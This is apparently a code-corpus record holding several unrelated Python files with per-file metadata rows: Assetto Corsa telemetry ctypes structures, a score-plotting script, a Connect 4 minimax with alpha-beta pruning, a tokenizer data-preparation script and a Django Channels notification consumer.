("aidAutoClutch", c_int),
("aidAutoBlip", c_int),
("hasDRS", c_int),
("hasERS", c_int),
("hasKERS", c_int),
("kersMaxJ", c_float),
("engineBrakeSettingsCount", c_int),
("ersPowerControllerCount", c_int),
("trackSPlineLength", c_float),
("trackConfiguration", c_wchar * 33),
("ersMaxJ", c_float),
("isTimedRace", c_int),
("hasExtraLap", c_int),
("carSkin", c_wchar * 33),
("reversedGridPositions", c_int),
("PitWindowStart", c_int),
("PitWindowEnd", c_int),
("isOnline", c_int),
]
class Physics(Structure):
_fields_ = [
("packetId", c_int),
("gas", c_float),
("brake", c_float),
("fuel", c_float),
("gear", c_int),
("rpms", c_int),
("steerAngle", c_float),
("speedKmh", c_float),
("velocity", c_float * 3),
("accG", c_float * 3),
("wheelSlip", c_float * 4),
("wheelLoad", c_float * 4),
("wheelsPressure", c_float * 4),
("wheelAngularSpeed", c_float * 4),
("tyreWear", c_float * 4),
("tyreDirtyLevel", c_float * 4),
("tyreCoreTemperature", c_float * 4),
("camberRAD", c_float * 4),
("suspensionTravel", c_float * 4),
("drs", c_float),
("tc", c_float),
("heading", c_float),
("pitch", c_float),
("roll", c_float),
("cgHeight", c_float),
("carDamage", c_float * 5),
("numberOfTyresOut", c_int),
("pitLimiterOn", c_int),
("abs", c_float),
("kersCharge", c_float),
("kersInput", c_float),
("autoShifterOn", c_int),
("rideHeight", c_float * 2),
("turboBoost", c_float),
("ballast", c_float),
("airDensity", c_float),
("airTemp", c_float),
("roadTemp", c_float),
("localAngularVel", c_float * 3),
("finalFF", c_float),
("performanceMeter", c_float),
("engineBrake", c_int),
("ersRecoveryLevel", c_int),
("ersPowerLevel", c_int),
("ersHeatCharging", c_int),
("ersIsCharging", c_int),
("kersCurrentKJ", c_float),
("drsAvailable", c_int),
("drsEnabled", c_int),
("brakeTemp", c_float * 4),
("clutch", c_float),
("tyreTempI", c_float * 4),
("tyreTempM", c_float * 4),
("tyreTempO", c_float * 4),
("isAIControlled", c_int),
("tyreContactPoint", c_float * 4 * 3),
("tyreContactNormal", c_float * 4 * 3),
("tyreContactHeading", c_float * 4 * 3),
("brakeBias", c_float),
("localVelocity", c_float * 3),
("P2PActivations", c_int),
("P2PStatus", c_int),
("currentMaxRpm", c_int),
("mz", c_float * 4),
("fx", c_float * 4),
("fy", c_float * 4),
("slipRatio", c_float * 4),
("slipAngle", c_float * 4),
("tcinAction", c_int),
("absInAction", c_int),
("suspensionDamage", c_float * 4),
("tyreTemp", c_float * 4),
]
class Graphics(Structure):
_fields_ = [
("packetId", c_int),
("AC_STATUS", c_int),
("AC_SESSION_TYPE", c_int),
("currentTime", c_wchar * 15),
("lastTime", c_wchar * 15),
("bestTime", c_wchar * 15),
("split", c_wchar * 15),
("completedLaps", c_int),
("position", c_int),
("iCurrentTime", c_int),
("iLastTime", c_int),
("iBestTime", c_int),
("sessionTimeLeft", c_float),
("distanceTraveled", c_float),
("isInPit", c_int),
("currentSectorIndex", c_int),
("lastSectorTime", c_int),
("numberOfLaps", c_int),
("tyreCompound", c_wchar * 33),
("replayTimeMultiplier", c_float),
("normalizedCarPosition", c_float),
("activeCars", c_int),
("carCoordinates", c_float * 60 * 3),
("carID", c_int * 60),
("playerCarID", c_int),
("penaltyTime", c_float),
("flag", c_int),
("penalty", c_int),
("idealLineOn", c_int),
("isInPitLane", c_int),
("surfaceGrip", c_float),
("mandatoryPitDone", c_int),
("windSpeed", c_float),
("windDirection", c_float),
("isSetupMenuVisible", c_int),
("mainDisplayIndex", c_int),
("secondaryDisplayIndex", c_int),
("TC", c_int),
("TCCut", c_int),
("EngineMap", c_int),
("ABS", c_int),
("fuelXLap", c_int),
("rainLights", c_int),
("flashingLights", c_int),
("lightsStage", c_int),
("exhaustTemperature", c_float),
("wiperLV", c_int),
("DriverStintTotalTimeLeft", c_int),
("DriverStintTimeLeft", c_int),
("rainTypes", c_int),
]
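if __name__ == "__main__":
    # Demonstration sketch (not part of the original module): read the live
    # physics block from shared memory. "Local\\acpmf_physics" is the mapping
    # name commonly used by AC/ACC telemetry tools; this works on Windows
    # while the simulator is running.
    import mmap

    buf = mmap.mmap(-1, sizeof(Physics), "Local\\acpmf_physics")
    physics = Physics.from_buffer_copy(buf)
    print(f"speed: {physics.speedKmh:.1f} km/h, gear: {physics.gear}")
    buf.close()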
| 32.416216
| 70
| 0.516925
| 592
| 5,997
| 4.925676
| 0.334459
| 0.162551
| 0.062414
| 0.00823
| 0.018519
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017703
| 0.302985
| 5,997
| 184
| 71
| 32.592391
| 0.679904
| 0.017842
| 0
| 0.028571
| 0
| 0
| 0.303262
| 0.022766
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005714
| 0
| 0.04
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5b4c9c1dbb3216905a27aa4ce2edea78394a9e2
| 2,554
|
py
|
Python
|
scripts/plot_fc_bc.py
|
dpmerrell/TrialMDP-analyses
|
07e7d2b8aa918e6d314a315be487afc28659a00e
|
[
"MIT"
] | null | null | null |
scripts/plot_fc_bc.py
|
dpmerrell/TrialMDP-analyses
|
07e7d2b8aa918e6d314a315be487afc28659a00e
|
[
"MIT"
] | null | null | null |
scripts/plot_fc_bc.py
|
dpmerrell/TrialMDP-analyses
|
07e7d2b8aa918e6d314a315be487afc28659a00e
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
import script_util as su
import pandas as pd
import numpy as np
import argparse
def get_score(tsv_file, pA, pB, score_name):
df = pd.read_csv(tsv_file, sep="\t")
df.set_index(["pA", "pB"], inplace=True)
return float(df.loc[(pA, pB), score_name])
def get_N(tsv_file, pA, pB):
df = pd.read_csv(tsv_file, sep="\t")
df.set_index(["pA", "pB"], inplace=True)
return int(df.loc[(pA, pB), "pat"])
def collect_scores(tsv_files, pA, pB, score_name):
path_info = [su.parse_path(tsv) for tsv in tsv_files]
fcs = [pi["fc"] for pi in path_info]
bcs = [pi["bc"] for pi in path_info]
scores = [get_score(tsv, pA, pB, score_name) for tsv in tsv_files]
fc_ls = sorted(list(set(fcs)))
bc_ls = sorted(list(set(bcs)))
fc_to_idx = {str(fc): i for i, fc in enumerate(fc_ls)}
bc_to_idx = {str(bc): i for i, bc in enumerate(bc_ls)}
score_mat = np.empty((len(fc_ls), len(bc_ls)))
score_mat[:,:] = np.nan
for fc, bc, score in zip(fcs, bcs, scores):
score_mat[fc_to_idx[str(fc)], bc_to_idx[str(bc)]] = score
return fc_ls, bc_ls, score_mat
def plot_scores(fc_ls, bc_ls, score_mat):
#plt.imshow(score_mat, vmin=0.0, vmax=1.0, origin="lower", cmap="binary")
plt.imshow(np.transpose(score_mat), origin="lower", cmap="binary")
plt.xticks(range(len(fc_ls)), fc_ls)
plt.yticks(range(len(bc_ls)), bc_ls)
plt.xlabel(su.NICE_NAMES["fc"])
plt.ylabel(su.NICE_NAMES["bc"])
return
if __name__=="__main__":
parser = argparse.ArgumentParser()
parser.add_argument("design")
parser.add_argument("pA", type=float)
parser.add_argument("pB", type=float)
parser.add_argument("score_name")
parser.add_argument("out_png")
parser.add_argument("--score_tsvs", nargs="+")
args = parser.parse_args()
fc, bc, scores = collect_scores(args.score_tsvs,
args.pA, args.pB,
args.score_name)
N = get_N(args.score_tsvs[0], args.pA, args.pB)
plot_scores(fc, bc, scores)
plt.colorbar()
plt.title("{}\n{}; {}={}; {}={}, {}={}".format(su.NICE_NAMES[args.score_name],
su.NICE_NAMES[args.design],
su.NICE_NAMES["pat"], N,
su.NICE_NAMES["pA"], args.pA,
su.NICE_NAMES["pB"], args.pB)
)
plt.tight_layout()
plt.savefig(args.out_png)
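# Example invocation (hypothetical arguments; "trialmdp" and "reward" must be
# keys in script_util.NICE_NAMES, and the fc/bc values are parsed from the
# TSV file paths by script_util.parse_path):
#   python scripts/plot_fc_bc.py trialmdp 0.5 0.6 reward out.png \
#       --score_tsvs results/fc=2.0_bc=0.1/scores.tsv results/fc=4.0_bc=0.1/scores.tsv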
| 27.462366
| 82
| 0.583399
| 388
| 2,554
| 3.613402
| 0.255155
| 0.022825
| 0.054922
| 0.03709
| 0.268188
| 0.098431
| 0.075606
| 0.075606
| 0.075606
| 0.075606
| 0
| 0.002644
| 0.259593
| 2,554
| 92
| 83
| 27.76087
| 0.738763
| 0.028191
| 0
| 0.070175
| 0
| 0
| 0.046774
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.070175
| false
| 0
| 0.087719
| 0
| 0.22807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5b5bab4def1ed3509dd85a680dfad03dc1b2fa0
| 5,466
|
py
|
Python
|
pyai/search/minimax.py
|
bpesquet/pyai
|
09f6e9989c9c3d3619b45a0aab2bd363141dfe58
|
[
"MIT"
] | null | null | null |
pyai/search/minimax.py
|
bpesquet/pyai
|
09f6e9989c9c3d3619b45a0aab2bd363141dfe58
|
[
"MIT"
] | null | null | null |
pyai/search/minimax.py
|
bpesquet/pyai
|
09f6e9989c9c3d3619b45a0aab2bd363141dfe58
|
[
"MIT"
] | null | null | null |
"""
Minimax algorithm with alpha-beta pruning applied to the Connect 4 game.
Inspired by https://youtu.be/l-hh51ncgDI
"""
import os
import copy
import math
def minimax(game, depth, maximize, alpha=None, beta=None):
"""Minimax algorithm, using (optionally) alpha-beta pruning."""
if depth == 0:
# Maximum depth reached: evaluate current position
return evaluate(game), game, 1, alpha, beta
color = get_player_color(maximize)
# Init best score with worst possible value
# -∞ if maximizing, +∞ if minimizing
best_score = -math.inf if maximize else math.inf
best_position = []
total_evaluated_positions = 0
for position in next_valid_positions(game, color):
# Recursive minimax call for next positions of current player
score, _, num_evaluated_positions, _, _ = minimax(
position, depth - 1, not maximize, alpha, beta
)
total_evaluated_positions += num_evaluated_positions
# Store evaluation and best possible position
# (the one which improves score if maximizing, or diminish score if minimizing)
if (maximize and score > best_score) or (not maximize and score < best_score):
best_score = score
best_position = position
if alpha is not None and beta is not None:
# Alpha-beta pruning
# alpha is the minimum guaranteed score for the maximizing player
# beta is the maximum guaranteed score for the minimizing player
if maximize:
alpha = max(alpha, best_score)
else:
beta = min(beta, best_score)
            if beta <= alpha:
                # Further positions cannot improve the score: skip them
                break
return best_score, best_position, total_evaluated_positions, alpha, beta
def get_player_color(maximize):
"""Return the color (R or Y) for a player.
The maximizing player plays red, the minimizing player plays yellow.
"""
return "R" if maximize else "Y"
def compute_disc_row(game, y):
"""Compute at which row a disc will fall when played in a column."""
x = -1
while x < len(game) - 1 and game[x + 1][y] == " ":
x += 1
return x
def next_valid_positions(game, color):
"""Return a list of all next valid positions for playing a color."""
positions = []
for y in range(len(game[0])):
x = compute_disc_row(game, y)
if x != -1: # A play is possible in column y
# Clone game (which is a list of lists, hence the need for deep copy)
            # to obtain a new, independent list
# https://stackoverflow.com/a/28684234
nouveau_game = copy.deepcopy(game)
nouveau_game[x][y] = color
positions.append(nouveau_game)
return positions
def evaluate(game):
"""Evaluate a game position.
Evaluation method is as follows:
- a winning position is either +100 (for red) or -100 (for yellow).
- otherwise, the number of red triplets (aligned red discs)
    is subtracted from the number of yellow triplets.
"""
if count_alignments(game, "R", 4) == 1:
return 100
if count_alignments(game, "Y", 4) == 1:
return -100
red_triplets = count_alignments(game, "R", 3)
yellow_triplets = count_alignments(game, "Y", 3)
return red_triplets - yellow_triplets
def count_alignments(game, color, target_number):
"""Count the number of alignments of target_number discs for a color."""
alignments = 0
# Horizontal alignments
for x, _ in enumerate(game):
for y in range(len(game[x]) - target_number + 1):
if game[x][y : y + target_number] == [color] * target_number:
# print(f"Horizontal alignment of {target_number} {color} in ({x}, {y})")
alignments += 1
# Vertical alignments
for x in range(len(game) - target_number + 1):
for y in range(len(game[x])):
# game[x : x + target_number] returns a list of lists
# We retrieve the yth element of each one: a vertical line
if [ligne[y] for ligne in game[x : x + target_number]] == [
color
] * target_number:
# print(f"Vertical alignment of {target_number} {color} in ({x}, {y})")
alignments += 1
# Diagonal alignments
for x, _ in enumerate(game):
for y in range(len(game[x]) - target_number + 1):
# game[x : x + target_number] returns a list of lists
# We retrieve the (y+i)th element of each one: a diagonal line
if [
ligne[y + i] for i, ligne in enumerate(game[x : x + target_number])
] == [color] * target_number:
# print(f"Diagonal alignment of {target_number} {color} in ({x}, {y})")
alignments += 1
return alignments
def init_game(n_rows, n_columns, red_discs, yellow_discs):
"""Init an empty game with some initial moves.
Game is a 2D grid indexed from top left (0,0) to bottom right.
"""
game = [[" " for _ in range(n_columns)] for _ in range(n_rows)]
for x, y in red_discs:
game[x][y] = "R"
for x, y in yellow_discs:
game[x][y] = "Y"
return game
def to_string(game):
"""Return a string representation of a game position."""
return os.linesep.join([" | ".join([f"{disc}" for disc in row]) for row in game])
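if __name__ == "__main__":
    # Minimal demonstration sketch (not part of the original module):
    # search 4 plies ahead from a small opening position with pruning enabled.
    demo = init_game(6, 7, red_discs=[(5, 3)], yellow_discs=[(5, 2)])
    score, best, n_evals, _, _ = minimax(demo, 4, True, alpha=-math.inf, beta=math.inf)
    print(f"score={score} ({n_evals} positions evaluated)")
    print(to_string(best))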
| 32.730539
| 89
| 0.612697
| 747
| 5,466
| 4.382865
| 0.231593
| 0.058644
| 0.023824
| 0.021381
| 0.229383
| 0.154246
| 0.148748
| 0.132254
| 0.132254
| 0.132254
| 0
| 0.012652
| 0.291438
| 5,466
| 166
| 90
| 32.927711
| 0.832171
| 0.374131
| 0
| 0.089744
| 0
| 0
| 0.005738
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.102564
| false
| 0
| 0.038462
| 0
| 0.282051
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5b832c7207c148b4f89c1e17e84f452793c1e36
| 3,397
|
py
|
Python
|
src/preparation/2_prepare_0_tokens.py
|
wietsedv/gpt2-recycle
|
7d1dbac01f111d87445de5b950c88971c0a1b733
|
[
"Apache-2.0"
] | 42
|
2020-12-11T09:21:10.000Z
|
2022-02-20T01:44:32.000Z
|
src/preparation/2_prepare_0_tokens.py
|
wietsedv/gpt2-recycle
|
7d1dbac01f111d87445de5b950c88971c0a1b733
|
[
"Apache-2.0"
] | 2
|
2020-12-15T14:40:33.000Z
|
2021-08-02T07:04:42.000Z
|
src/preparation/2_prepare_0_tokens.py
|
wietsedv/gpt2-recycle
|
7d1dbac01f111d87445de5b950c88971c0a1b733
|
[
"Apache-2.0"
] | 5
|
2020-12-13T16:03:03.000Z
|
2021-08-09T14:18:37.000Z
|
from argparse import ArgumentParser
from pathlib import Path
import pickle
import os
from tqdm import tqdm
from tokenizers import Tokenizer
from tokenizers.processors import RobertaProcessing
from transformers import AutoTokenizer
def init_tokenizer(lang, n, m):
if n is None and m is None:
        print('neither size nor model is specified, but one of them is required')
exit(1)
if m is not None:
tokenizer = AutoTokenizer.from_pretrained(m, use_fast=True)
return tokenizer
tokenizer = Tokenizer.from_file(
str(
Path('data') / lang / 'preparation' / 'vocabularies' /
f'{lang}-{str(n).zfill(3)}k.tokenizer.json'))
tokenizer.post_processor = RobertaProcessing(
('</s>', tokenizer.token_to_id('</s>')),
('<s>', tokenizer.token_to_id('<s>')),
trim_offsets=True)
return tokenizer
def tokenize_doc(tokenizer: Tokenizer, doc):
enc = tokenizer.encode(doc)
    if isinstance(enc, list):
return enc
return enc.ids
def tokenize_file(tokenizer, src_path, eot=None):
examples = []
doc = ''
with open(src_path) as f:
for line in tqdm(f):
if eot is None and line == '\n':
examples.append(tokenize_doc(tokenizer, doc))
doc = ''
continue
elif eot is not None and line == eot + '\n':
examples.append(tokenize_doc(tokenizer, doc.strip()))
doc = ''
continue
doc += line
if doc != '':
examples.append(tokenize_doc(tokenizer, doc))
return examples
def main():
parser = ArgumentParser()
parser.add_argument('lang')
parser.add_argument('--size',
type=int,
default=None,
help='vocab size (in thousands)')
parser.add_argument('--model',
default=None,
help='HuggingFace model identifier')
parser.add_argument('--eot', default=None)
args = parser.parse_args()
prep_dir = Path('data') / args.lang / 'preparation' / 'prepared'
dst_path = prep_dir / ('data.pkl' if args.size is None else
f'data-{str(args.size).zfill(3)}k.pkl')
if not dst_path.parent.exists():
os.makedirs(dst_path.parent)
print(f' > preparing {dst_path}')
tokenizer = init_tokenizer(args.lang, args.size, args.model)
examples = []
src_paths = sorted((Path('data') / args.lang / 'preparation' /
'plaintext').glob('**/*.txt'))
for src_path in src_paths:
print('🔥', src_path)
new_examples = tokenize_file(tokenizer, src_path, eot=args.eot)
if src_path.name in ['train.txt', 'valid.txt', 'test.txt']:
subset = src_path.name.split('.')[0]
out_path = dst_path.parent / dst_path.name.replace(
'data', f'data-{subset}')
print(f' > exporting {len(new_examples):,} examples to {out_path}')
with open(out_path, 'wb') as f:
pickle.dump(new_examples, f)
examples.extend(new_examples)
print(f' ::: {len(examples):,} examples loaded')
print(f'{len(examples):,} examples')
print(f' > exporting {dst_path}')
with open(dst_path, 'wb') as f:
pickle.dump(examples, f)
if __name__ == '__main__':
main()
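# Example invocation (a sketch; the language code "nld" and the directory
# layout are assumptions matching the paths constructed above):
#   python src/preparation/2_prepare_0_tokens.py nld --size 40
# This tokenizes data/nld/preparation/plaintext/**/*.txt with
# data/nld/preparation/vocabularies/nld-040k.tokenizer.json and writes
# data/nld/preparation/prepared/data-040k.pkl (plus per-split pickles for
# train.txt/valid.txt/test.txt if present).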
| 30.603604
| 79
| 0.578746
| 411
| 3,397
| 4.649635
| 0.306569
| 0.029304
| 0.041863
| 0.039246
| 0.186813
| 0.132391
| 0.03977
| 0
| 0
| 0
| 0
| 0.001664
| 0.292317
| 3,397
| 110
| 80
| 30.881818
| 0.792845
| 0
| 0
| 0.151163
| 0
| 0
| 0.158669
| 0.02826
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0
| 0.093023
| 0
| 0.197674
| 0.081395
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5b8963f6516bffc7a6999cc9be33b3103b93631
| 1,175
|
py
|
Python
|
src/notifi/consumers.py
|
earth-emoji/love
|
3617bd47c396803c411e136b3e1de87c18e03890
|
[
"BSD-2-Clause"
] | null | null | null |
src/notifi/consumers.py
|
earth-emoji/love
|
3617bd47c396803c411e136b3e1de87c18e03890
|
[
"BSD-2-Clause"
] | 7
|
2021-03-19T10:46:09.000Z
|
2022-03-12T00:28:55.000Z
|
src/notifi/consumers.py
|
earth-emoji/love
|
3617bd47c396803c411e136b3e1de87c18e03890
|
[
"BSD-2-Clause"
] | null | null | null |
from channels.generic.websocket import WebsocketConsumer
import json
from asgiref.sync import async_to_sync
class NotificationConsumer(WebsocketConsumer):
# Function to connect to the websocket
def connect(self):
# Checking if the User is logged in
if self.scope["user"].is_anonymous:
# Reject the connection
self.close()
else:
# print(self.scope["user"]) # Can access logged in user details by using self.scope.user, Can only be used if AuthMiddlewareStack is used in the routing.py
self.group_name = str(self.scope["user"].pk) # Setting the group name as the pk of the user primary key as it is unique to each user. The group name is used to communicate with the user.
async_to_sync(self.channel_layer.group_add)(self.group_name, self.channel_name)
self.accept()
    # Function to disconnect the socket
    def disconnect(self, close_code):
        self.close()
    # Custom notify handler; views or APIs reach it via channel_layer.group_send to push a message to the frontend
def notify(self, event):
self.send(text_data=json.dumps(event["text"]))
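# Example of triggering `notify` from a Django view (a sketch; assumes a
# channel layer is configured in settings.py):
#   from asgiref.sync import async_to_sync
#   from channels.layers import get_channel_layer
#   async_to_sync(get_channel_layer().group_send)(
#       str(user.pk), {"type": "notify", "text": {"message": "Hello"}})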
| 43.518519
| 199
| 0.685106
| 168
| 1,175
| 4.720238
| 0.470238
| 0.045397
| 0.065574
| 0.040353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.241702
| 1,175
| 27
| 200
| 43.518519
| 0.890011
| 0.440851
| 0
| 0.133333
| 0
| 0
| 0.018519
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.2
| 0
| 0.466667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|